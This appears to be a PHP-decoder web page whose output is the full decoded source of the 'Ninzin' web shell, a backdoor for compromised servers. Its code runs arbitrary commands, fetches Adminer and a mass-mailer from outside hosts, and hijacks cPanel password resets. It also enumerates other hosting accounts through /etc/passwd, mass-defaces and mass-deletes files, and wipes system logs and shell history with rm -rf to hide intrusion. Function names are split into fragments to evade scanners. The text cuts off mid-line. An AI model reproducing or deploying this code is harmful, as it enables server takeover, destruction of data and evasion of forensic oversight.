Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? goto bDGIE; vKzed: function unzip($file, $lokasi) { if (!is_readable($file)) { red("Ca..
Decoded Output download
<? goto bDGIE; vKzed: function unzip($file, $lokasi) { if (!is_readable($file)) { red("Cannot Unzip File / Unreadable File !"); die; } elseif (strpos(file_get_contents($file), "PK\3\4") === false) { red("This isn't Zip File !"); die; } $zip = new ZipArchive(); $res = $zip->open($file); if ($res == true) { $zip->extractTo($lokasi); $zip->close(); green("Success Unzip File !"); } else { red("Failed to Unzip File !"); } } goto hAab2; Du9kO: echo "<a class="destroy_table" href="?path=" . $lokasi . "&komend=headshoot"><i class="fas fa-terminal"></i> C0mmand</a>"; goto ijH8y; VvLMe: echo "<div class="text-center">"; goto SfLkK; uW31K: function ggr($fl) { $a = "fun" . "cti" . "on_" . "exis" . "ts"; $b = "po" . "si" . "x_ge" . "tgr" . "gid"; $c = "fi" . "le" . "gro" . "up"; if ($a($b)) { if (!$a($c)) { return "?"; } $d = $b($c($fl)); if (empty($d)) { $e = $c($fl); if (empty($e)) { return "?"; } else { return $e; } } else { return $d["name"]; } } elseif ($a($c)) { return $c($fl); } else { return "?"; } } goto tl8xe; CxEzp: echo "</table><br>"; goto s5p3N; C6XDb: $total = hdd(disk_total_space("/")); goto NTU1c; zRnLc: $euybrekw = $srl("//", "/", $euybrekw); goto m6yLj; RyRkz: $rad = "RE" . "M" . "OTE_AD" . "DR"; goto CYemH; IreJh: $fsz = "fi" . "lesi" . "ze"; goto T1npO; JwZiV: echo " | WGET : "; goto r3ubz; lIOqg: if (!is_readable($lokasi)) { die("<center>This directory is unreadable :(</center>"); } elseif (isset($_GET["adminer"])) { $dir = $_GET["path"]; $full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists("adminer.php")) { echo "<center><a href='{$full}/adminer.php' target='_blank'><font color='green'> ===>>> Adminer Login <<<=== </a></font></center><br/>"; } else { if (adminer("https://shell.prinsh.com/Nathan/adminer.txt", "adminer.php")) { echo "<center><a href='{$full}/adminer.php' target='_blank'><font color='green'> ===>>> Adminer Login <<<=== </a></font></center><br/>"; } else { echo "<center><font color=red>Gagal Membuat File Adminer</font></center><br/>"; } } die; } elseif (isset($_GET["phpmailer"])) { $dir = $_GET["path"]; $full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $dir); function phpmailer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists("leaf.php")) { echo "<center><a href='{$full}/leaf.php' target='_blank'><font color='green'> ===>>> Mailer Login <<<=== </a></font></center><br/>"; } else { if (phpmailer("https://raw.githubusercontent.com/0xNix/leafmailer/main/leaf.php", "leaf.php")) { echo "<center><a href='{$full}/leaf.php' target='_blank'><font color='green'> ===>>> Mailer Login <<<=== </a></font></center><br/>"; } else { echo "<center><font color=red>Gagal Membuat File Mailer</font></center><br/>"; } } die; } elseif (isset($_GET["cpcrack"])) { echo "<center><br/><h2 class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</h2>
\x9\x9<form method="POST">\xa \x9<div align="center" class="form-group">
\x9<input type="email" name="email" class="up" style="width: 450px; cursor: pointer; border-color: #fff" placeholder="Masukan Email Lu Ngab..."/><br/>
\x9\x9\x9\x9<br><input type="submit" name="submit" class="up" style="width: 450px; cursor: pointer; border-color: #fff" value="Send"/>
\x9\x9 </div>
\x9 </form></center><br>"; if (isset($_POST["submit"])) { $user = get_current_user(); $site = $_SERVER["HTTP_HOST"]; $ips = getenv("REMOTE_ADDR"); $email = $_POST["email"]; $wr = "email:" . $email; $f = @fopen("/home/" . $user . "/.cpanel/contactinfo", "w"); fwrite($f, $wr); fclose($f); $f = fopen("/home/" . $user . "/.contactinfo", "w"); fwrite($f, $wr); fclose($f); $parm = $site . ":2082/resetpass?start=1"; echo "<br/><center>Url: " . $parm . "</center>"; echo "<br/><center>Username: " . $user . "</center>"; echo "<br/><center>Success Reset To: " . $email . "</center><br/><br/>"; } die; } elseif (isset($_GET["jumping"])) { $i = 0; $dir = $_GET["path"]; echo "<div class='card container'>"; if (preg_match("/hsphere/", $dir)) { $urls = explode("
", $_POST["url"]); if (isset($_POST["jump"])) { echo "<pre>"; foreach ($urls as $url) { $url = str_replace(array("http://", "www."), '', strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc, "r"); while ($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/{$user}"; if (is_dir($dir_user) === true) { $url_user = $dir_user . "/" . $url; if (is_readable($url_user)) { $i++; $jrw = "[<font color=green>R</font>] <a href='?dir={$url_user}'><font color=#0046FF>{$url_user}</font></a>"; if (is_writable($url_user)) { $jrw = "[<font color=green>RW</font>] <a href='?dir={$url_user}'><font color=#0046FF>{$url_user}</font></a>"; } echo $jrw . "<br>"; } } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . $ip; } echo "</pre>"; } else { echo "<center>
\x9\x9\x9\x9\x9 <form method="post">
\x9 List Domains: <br>
\x9\x9\x9\x9\x9 <textarea name="url" class="form-control">"; $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt", "r"); while ($getss = fgets($fp)) { echo $getss; } echo "</textarea><br>\xa\x9 \x9\x9 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">\xa \x9\x9\x9 </form></center>"; } } elseif (preg_match("/vhosts/", $dir)) { $urls = explode("
\xa", $_POST["url"]); if (isset($_POST["jump"])) { echo "<pre>"; foreach ($urls as $url) { $web_vh = "/var/www/vhosts/{$url}/httpdocs"; if (is_dir($web_vh) === true) { if (is_readable($web_vh)) { $i++; $jrw = "[<font color=green>R</font>] <a href='?dir={$web_vh}'><font color=#0046FF>{$web_vh}</font></a>"; if (is_writable($web_vh)) { $jrw = "[<font color=green>RW</font>] <a href='?dir={$web_vh}'><font color=#0046FF>{$web_vh}</font></a>"; } echo $jrw . "<br>"; } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . $ip; } echo "</pre>"; } else { echo "<center>\xa\x9\x9\x9\x9 <form method="post">
\x9 \x9\x9\x9 List Domains: <br>
\x9 \x9\x9 <textarea name="url" class="form-control">"; bing("ip:{$ip}"); echo "</textarea><br>\xa\x9\x9\x9 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">\xa\xa\x9 </form></center>"; } } else { echo "<pre>"; $etc = "/etc/passwd"; $opening = @fopen("{$etc}", "r") or die("<center><font color=red>Can't read /etc/passwd</font></center><br/>"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "<font color=red>Can't read /etc/passwd</font><br/>"; } else { preg_match_all("/(.*?):x:/", $passwd, $user_jumping); foreach ($user_jumping[1] as $user_pro_jump) { $user_jumping_dir = "/home/{$user_pro_jump}/public_html"; if (is_readable($user_jumping_dir)) { $i++; $jrw = "[<font color=green>R</font>] <a href='?dir={$user_jumping_dir}'><font color=#0046FF>{$user_jumping_dir}</font></a>"; if (is_writable($user_jumping_dir)) { $jrw = "[<font color=green>RW</font>] <a href='?dir={$user_jumping_dir}'><font color=#0046FF>{$user_jumping_dir}</font></a>"; } echo $jrw; if (function_exists("posix_getpwuid")) { $domain_jump = file_get_contents("/etc/named.conf"); if ($domain_jump == '') { echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach ($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/{$dj}")); $user_jumping_url = $user_jumping_url["name"]; if ($user_jumping_url == $user_pro_jump) { echo " => ( <u>{$dj}</u> )<br>"; break; } } } } else { echo "<br>"; } } } } } if ($i == 0) { } else { echo "<br>Total ada " . $i . " Kamar di " . $ip; } echo "</pre>"; } echo "</div><br/>"; die; } elseif (isset($_GET["about"])) { echo "<center><div class='card text-center bg-light about'>\xa\x9\x9\x9 <h2 class='card-header'><font face='Bungee Outline' size='6'>{ Ninzin Hidden Shell }</font></h2>\xa \x9\x9<div class='card-body'>
<div><img src='https://i.ibb.co/ZSksTyG/ninzinjp.webp' style='position: relative; border-radius: 50%; width='220' height='220'></div>\xa \x9\x9 <h4 class='card-text'>{ Ninzin Private Shell } hi everyone my name is ninzin, okay my goal is to make this backdoor shell so that it can penetrate all sites in the world xD...</h4> <h4 class='card-text'>and thanks to <a href='https://t.me/xzourt'><font color='yellow'>@xzourt</font></a> for helping me in making this shell. Happy hacking guys!</h4>\xa <audio controls='controls' src='https://d.top4top.io/m_2972fka851.mp3'></audio>
\x9 \x9</div>\xa \x9\x9\x9<div class='card-footer'>
\x9\x9\x9 \x9<p class='card-text'>Copyright 2024 { Ninzin.jp }</p>
\x9 \x9\x9</div>\xa\x9\x9 </div><br/></center>"; die; } elseif (isset($_GET["kill"])) { if (@unlink(preg_replace("!(d+)s.*!", '', __FILE__))) { die("<center><br><center><h2>Shell Removed!!!</h2><br>Goodbye Ninzin :(</center></center>"); } else { echo "<center>unlink failed!</center>"; } } goto d5Nl3; zmjIK: echo "<a class="destroy_table" href="?path=" . $lokasi . "&phpinfo=headshoot"><i class="fab fa-php"></i> PHP Info</a>"; goto Njo2H; lm9_W: echo "</center></td>\xa<td><center><form method="POST" action="?pilihan&path={$lokasi}">
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="pilihan">
<input type="hidden" name="path" value="{$lokasi}/path">\xa<button type='submit' class='btf' name='pilih' value='folder'><i class='fa fa-folder' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='file'><i class='fa fa-file' style='color: #fff'></i></button>\xa</form></center>"; goto qC3XU; eZqHv: echo "Server IP : <font color=gold>" . ipserv() . "</font> / Your IP : <font color=gold>" . $_SERVER["REMOTE_ADDR"] . "</font><br>"; goto YSYov; s5p3N: if (isset($_GET["fileloc"])) { echo "<tr><td>Current File : " . $_GET["fileloc"]; echo "</tr></td></table><br/>"; echo "<pre>" . htmlspecialchars(file_get_contents($_GET["fileloc"])) . "</pre>"; author(); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "hapus") { if (is_dir($_POST["path"])) { xrmdir($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); } } elseif (is_file($_POST["path"])) { @unlink($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to Delete File !"); } else { green("Delete File <i>" . basename($_POST["path"]) . "</i> Success !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahmod") { if (!isset($_POST["cemod"])) { if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<center>Fi" . "le : " . htmlspecialchars($_POST["path"]) . "<br>"; } else { echo "<center>D" . "ir : " . htmlspecialchars($_POST["path"]) . "<br>"; } echo "<form method="post">
Pe" . "rmi" . "ss" . "ion : <input name="perm" type="text" class="up" size="4" maxlength="4" value="" . $sub($spr("%o", $fp($_POST["path"])), -4) . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="ubahmod">"; if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<input type="hidden" name="type" value="fi" . "le">"; } else { echo "<input type="hidden" name="type" value="di" . "r">"; } echo "<input type="submit" value="Change" name="cemod" class="up" style="cursor: pointer; border-color: #fff"/>\xa </form><br>"; } else { $cm = @$chm($_POST["path"], $ocd($_POST["perm"])); if ($cm == true) { green("Change Permission Success !"); if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<center>Fi" . "le : " . htmlspecialchars($_POST["path"]) . "<br>"; } else { echo "<center>D" . "ir : " . htmlspecialchars($_POST["path"]) . "<br>"; } echo "<form method="post">\xa Pe" . "rmi" . "ss" . "ion : <input name="perm" type="text" class="up" size="4" maxlength="4" value="" . $sub($spr("%o", $fp($_POST["path"])), -4) . "" />\xa <input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="ubahmod">"; if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<input type="hidden" name="type" value="fi" . "le">"; } else { echo "<input type="hidden" name="type" value="di" . "r">"; } echo "<input type="submit" value="Change" name="cemod" class="up" style="cursor: pointer; border-color: #fff"/>\xa </form><br>"; } else { red("Change Permission Failed !"); if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<center>Fi" . "le : " . htmlspecialchars($_POST["path"]) . "<br>"; } else { echo "<center>D" . "ir : " . htmlspecialchars($_POST["path"]) . "<br>"; } echo "<form method="post">\xa Pe" . "rmi" . "ss" . "ion : <input name="perm" type="text" class="up" size="4" maxlength="4" value="" . $sub($spr("%o", $fp($_POST["path"])), -4) . "" />\xa <input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="ubahmod">"; if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<input type="hidden" name="type" value="fi" . "le">"; } else { echo "<input type="hidden" name="type" value="di" . "r">"; } echo "<input type="submit" value="Change" name="cemod" class="up" style="cursor: pointer; border-color: #fff"/>\xa </form><br>"; } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahtanggal") { if (isset($_POST["tanggale"])) { $stt = "st" . "rtot" . "ime"; $tch = "t" . "ou" . "ch"; $tanggale = $stt($_POST["tanggal"]); if (@$tch($_POST["path"], $tanggale) === true) { green("Change Da" . "te Succ" . "ess !"); $det = "da" . "te"; $ftm = "fi" . "le" . "mti" . "me"; $b = $det("d F Y H:i:s", $ftm($_POST["path"])); if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<center>Fi" . "le : " . htmlspecialchars($_POST["path"]) . "<br>"; } else { echo "<center>D" . "ir : " . htmlspecialchars($_POST["path"]) . "<br>"; } echo "<form method="post">\xa New Da" . "te : <input name="tanggal" type="text" class="up" size="20" value="" . $b . "" />\xa <input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="ubahtanggal">"; if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<input type="hidden" name="type" value="fi" . "le">"; } else { echo "<input type="hidden" name="type" value="di" . "r">"; } echo "<input type="submit" value="Change" name="tanggale" class="up" style="cursor: pointer; border-color: #fff"/>\xa </form><br>"; } else { red("Fai" . "led to Cha" . "nge Da" . "te !"); } } else { $det = "da" . "te"; $ftm = "fi" . "le" . "mti" . "me"; $b = $det("d F Y H:i:s", $ftm($_POST["path"])); if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<center>Fi" . "le : " . htmlspecialchars($_POST["path"]) . "<br>"; } else { echo "<center>D" . "ir : " . htmlspecialchars($_POST["path"]) . "<br>"; } echo "<form method="post">
New Da" . "te : <input name="tanggal" type="text" class="up" size="20" value="" . $b . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="ubahtanggal">"; if ($_POST["ty" . "pe"] == "fi" . "le") { echo "<input type="hidden" name="type" value="fi" . "le">"; } else { echo "<input type="hidden" name="type" value="di" . "r">"; } echo "<input type="submit" value="Change" name="tanggale" class="up" style="cursor: pointer; border-color: #fff"/>\xa </form><br>"; } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "gantinama") { if (isset($_POST["gantin"])) { $ren = @rename($_POST["path"], $_POST["newname"]); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST["name"])) { $namaawal = $_POST["newname"]; } else { $namawal = $_POST["name"]; } echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
New Name : <input name="newname" type="text" class="up" size="20" value="" . htmlspecialchars($bsn($_POST["path"])) . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="gantinama">
<input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #fff"/>
</form>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "edit") { if (isset($_POST["gasedit"])) { $edit = @file_put_contents($_POST["path"], $_POST["src"]); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "<center>" . $_POST["path"] . "<br><br>"; echo "<form method="post">\xa <textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br>
<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="edit">\xa <input type="submit" value="Edit File" name="gasedit" />
</form><br>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "dunlut") { dunlut($_POST["path"]); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "unzip") { unzip($_POST["path"], $lokasi); } elseif (isset($_GET["upload"])) { echo "<center>Upload File : "; echo "<form enctype="multipart/form-data" method="post">\xa<input type="radio" value="1" name="dirnya" checked>current_dir [ " . cekdir() . " ]\xa<input type="radio" value="2" name="dirnya" >document_root [ " . cekroot() . " ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br><br>\xaUpload File From Link :<br>\xa<input type="text" name="darilink" class="up" placeholder="https://404notfound.id/upload.txt"> <input type="text" name="namalink" class="up" size="3" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">\xa<br><br>403 Upload File<br>
<input type="file" id="datanya" onchange="setfilename(this.value); loadFile(this.files[0])"/>
<input type="hidden" name="bepasnama" id="namanya">
<textarea style="display: none" id="bepasdata" name="bepasdata"></textarea>\xa<input type="submit" name="bepas" value="Upload" class="up" style="cursor: pointer; border-color: #fff">
</form><br><br></center>"; } elseif (isset($_GET["komend"])) { echo "<center>"; echo "<form method="post" onsubmit="document.getElementById('komendnya').value = btoa(btoa(btoa(document.getElementById('komendnya').value)))">
" . @get_current_user() . "@" . ipserv() . ":~ $ <input type="text" name="komend" id="komendnya" style="background-color: #1f1f1f; color: #fff">\xa <input type="submit" name="eksekomend" value=" >> " class="up" style="cursor: pointer; border-color: #fff">\xa </form><br>"; if (isset($_POST["eksekomend"])) { ekse($_POST["komend"], $lokasi); } echo "</center>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "fo" . "ld" . "er") { if ($isw("./") || $ird("./")) { $loke = $_GET["path"]; if (isset($_POST["buatfolder"])) { $buatfolder = $mkd($loke . "/" . $_POST["fo" . "lde" . "rba" . "ru"]); if ($buatfolder == true) { green("Folder <b>" . htmlspecialchars($_POST["fo" . "lde" . "rba" . "ru"]) . "</b> Created !"); echo "<form method="post"><center>Folder : <input type="text" name="fo" . "lde" . "rba" . "ru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfolder" value="Create folder" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="folder"></form>"; } else { red("Failed to Create folder !"); echo "<form method="post"><center>Folder : <input type="text" name="fo" . "lde" . "rba" . "ru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfolder" value="Create folder" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="folder"></form>"; } } else { echo "<form method="post"><center>Folder : <input type="text" name="fo" . "lde" . "rba" . "ru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfolder" value="Create folder" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . ""><input type="hidden" name="pilih" value="folder"></form>"; } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "fi" . "le") { if ($isw("./") || $isr("./")) { $loke = $_GET["path"]; if (isset($_POST["buatfi" . "le"])) { $buatf = $fpt($loke . "/" . $_POST["fi" . "lebaru"], ''); if ($fxt($loke . "/" . $_POST["fi" . "lebaru"])) { green("File <b>" . htmlspecialchars($_POST["fi" . "lebaru"]) . "</b> Created !"); echo "<form method="post"><center>Filename : <input type="text" name="fi" . "lebaru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfi" . "le" value="Create File" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="fi" . "le"></form>"; } else { red("Failed to Create File !"); echo "<form method="post"><center>Filename : <input type="text" name="fi" . "lebaru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfi" . "le" value="Create File" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="pilih" value="fi" . "le"></form>"; } } else { echo "<form method="post"><center>Filename : <input type="text" name="fi" . "lebaru" class="up" style="cursor: pointer; border-color: #fff"> <input type="submit" name="buatfi" . "le" value="Create File" class="up" style="cursor: pointer; border-color: #fff"><br><br></center>"; echo "<input type="hidden" name="path" value="" . $_POST["path"] . ""><input type="hidden" name="pilih" value="fi" . "le"></form>"; } } } elseif (isset($_GET["massdeface"])) { function sabun_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "<center>[<font color=green>DONE</font>] {$lokasi}</center><br>"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc, $namafile, $isi_script); } } } } } } function sabun_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "<center>[<font color=green>DONE</font>] {$lokasi}<br></center>"; file_put_contents($lokasi, $isi_script); } } } } } } if (isset($_POST["start"])) { if ($_POST["tipe_sabun"] == "mahal") { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_massal($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); echo "</div>"; } elseif ($_POST["tipe_sabun"] == "murah") { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_biasa($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); echo "</div>"; } } else { echo "<center>"; echo "<form method='post'>
<font style='text-decoration: underline;'>Tipe Deface:</font><br>
<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>\xa <font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='{$lokasi}' class='up' style='width: 450px; cursor: pointer; border-color: #fff'><br>\xa\x9<font style='text-decoration: underline;'>Filename:</font><br>\xa <input type='text' name='d_file' value='Ninzin.php' class='up' style='width: 450px; cursor: pointer; border-color: #fff'><br>\xa <font style='text-decoration: underline;'>Index File:</font><br>
\x9<textarea name='script' class='up' style='width: 450px; height: 200px; color:white; border-color:#fff;'>Kissed By Ninzin</textarea><br>\xa\x9<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
</form></center><br>"; } } elseif (isset($_GET["massdelete"])) { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { if (file_exists("{$dir}/{$namafile}")) { unlink("{$dir}/{$namafile}"); } } elseif ($dirb === "..") { if (file_exists('' . dirname($dir) . "/{$namafile}")) { unlink('' . dirname($dir) . "/{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($lokasi)) { echo "<center>[<font color=red>DELETED</font>] {$lokasi}<br></center>"; unlink($lokasi); $idx = hapus_massal($dirc, $namafile); } } } } } } } if (isset($_POST["start"])) { echo "<div style='margin: 5px auto; padding: 5px'>"; hapus_massal($_POST["d_dir"], $_POST["d_file"]); echo "</div>"; } else { echo "<center>"; echo "<form method='post'>
\x9<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='{$lokasi}' class='up' style='width: 450px; cursor: pointer; border-color: #fff'><br>\xa <font style='text-decoration: underline;'>Filename:</font><br>
\x9<input type='text' name='d_file' value='index.php' class='up' style='width: 450px; cursor: pointer; border-color: #fff'><br>
<br><input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
</form></center><br>"; } } elseif (isset($_GET["phpinfo"])) { echo "<hr><br><center>"; echo "<center><h2>Server Php Info</h2></center>"; echo phpinfo(); echo "<center><hr><br></center>"; } elseif (isset($_GET["delete_logs"])) { echo "<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>"; echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>"; exec("rm -rf /tmp/logs"); exec("rm -rf /root/.ksh_history"); exec("rm -rf /root/.bash_history"); exec("rm -rf /root/.bash_logout"); exec("rm -rf /usr/local/apache/logs"); exec("rm -rf /usr/local/apache/log"); exec("rm -rf /var/apache/logs"); exec("rm -rf /var/apache/log"); exec("rm -rf /var/run/utmp"); exec("rm -rf /var/logs"); exec("rm -rf /var/log"); exec("rm -rf /var/adm"); exec("rm -rf /etc/wtmp"); exec("rm -rf /etc/utmp"); exec("rm -rf /var/log/lastlog"); exec("rm -rf /var/log/wtmp"); shell_exec("rm -rf /tmp/logs"); shell_exec("rm -rf /root/.ksh_history"); shell_exec("rm -rf /root/.bash_history"); shell_exec("rm -rf /root/.bash_logout"); shell_exec("rm -rf /usr/local/apache/logs"); shell_exec("rm -rf /usr/local/apache/log"); shell_exec("rm -rf /var/apache/logs"); shell_exec("rm -rf /var/apache/log"); shell_exec("rm -rf /var/run/utmp"); shell_exec("rm -rf /var/logs"); shell_exec("rm -rf /var/log"); shell_exec("rm -rf /var/adm"); shell_exec("rm -rf /etc/wtmp"); shell_exec("rm -rf /etc/utmp"); shell_exec("rm -rf /var/log/lastlog"); shell_exec("rm -rf /var/log/wtmp"); passthru("rm -rf /tmp/logs"); passthru("rm -rf /root/.ksh_history"); passthru("rm -rf /root/.bash_history"); passthru("rm -rf /root/.bash_logout"); passthru("rm -rf /usr/local/apache/logs"); passthru("rm -rf /usr/local/apache/log"); passthru("rm -rf /var/apache/logs"); passthru("rm -rf /var/apache/log"); passthru("rm -rf /var/run/utmp"); passthru("rm -rf /var/logs"); passthru("rm -rf /var/log"); passthru("rm -rf /var/adm"); passthru("rm -rf /etc/wtmp"); passthru("rm -rf /etc/utmp"); passthru("rm -rf /var/log/lastlog"); passthru("rm -rf /var/log/wtmp"); system("rm -rf /tmp/logs"); sleep(2); echo "<br>Deleting .../tmp/logs "; sleep(2); system("rm -rf /root/.bash_history"); sleep(2); echo "<p>Deleting .../root/.bash_history </p>"; system("rm -rf /root/.ksh_history"); sleep(2); echo "<p>Deleting .../root/.ksh_history </p>"; system("rm -rf /root/.bash_logout"); sleep(2); echo "<p>Deleting .../root/.bash_logout </p>"; system("rm -rf /usr/local/apache/logs"); sleep(2); echo "<p>Deleting .../usr/local/apache/logs </p>"; system("rm -rf /usr/local/apache/log"); sleep(2); echo "<p>Deleting .../usr/local/apache/log </p>"; system("rm -rf /var/apache/logs"); sleep(2); echo "<p>Deleting .../var/apache/logs </p>"; system("rm -rf /var/apache/log"); sleep(2); echo "<p>Deleting .../var/apache/log </p>"; system("rm -rf /var/run/utmp"); sleep(2); echo "<p>Deleting .../var/run/utmp </p>"; system("rm -rf /var/logs"); sleep(2); echo "<p>Deleting .../var/logs </p>"; system("rm -rf /var/log"); sleep(2); echo "<p>Deleting .../var/log </p>"; system("rm -rf /var/adm"); sleep(2); echo "<p>Deleting .../var/adm </p>"; system("rm -rf /etc/wtmp"); sleep(2); echo "<p>Deleting .../etc/wtmp </p>"; system("rm -rf /etc/utmp"); sleep(2); echo "<p>Deleting .../etc/utmp </p>"; system("rm -rf /var/log/lastlog"); sleep(2); echo "<p>Deleting .../var/log/lastlog </p>"; system("rm -rf /var/log/wtmp"); sleep(2); echo "<p>Deleting .../var/log/wtmp </p>"; sleep(4); echo "<br><br><p>Your Traces Has Been Successfully Deleting ...From the Server"; echo "</td></tr></table>"; } elseif (isset($_GET["delete_logs"])) { echo "<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>"; echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>"; exec("rm -rf /tmp/logs"); exec("rm -rf /root/.ksh_history"); exec("rm -rf /root/.bash_history"); exec("rm -rf /root/.bash_logout"); exec("rm -rf /usr/local/apache/logs"); exec("rm -rf /usr/local/apache/log"); exec("rm -rf /var/apache/logs"); exec("rm -rf /var/apache/log"); exec("rm -rf /var/run/utmp"); exec("rm -rf /var/logs"); exec("rm -rf /var/log"); exec("rm -rf 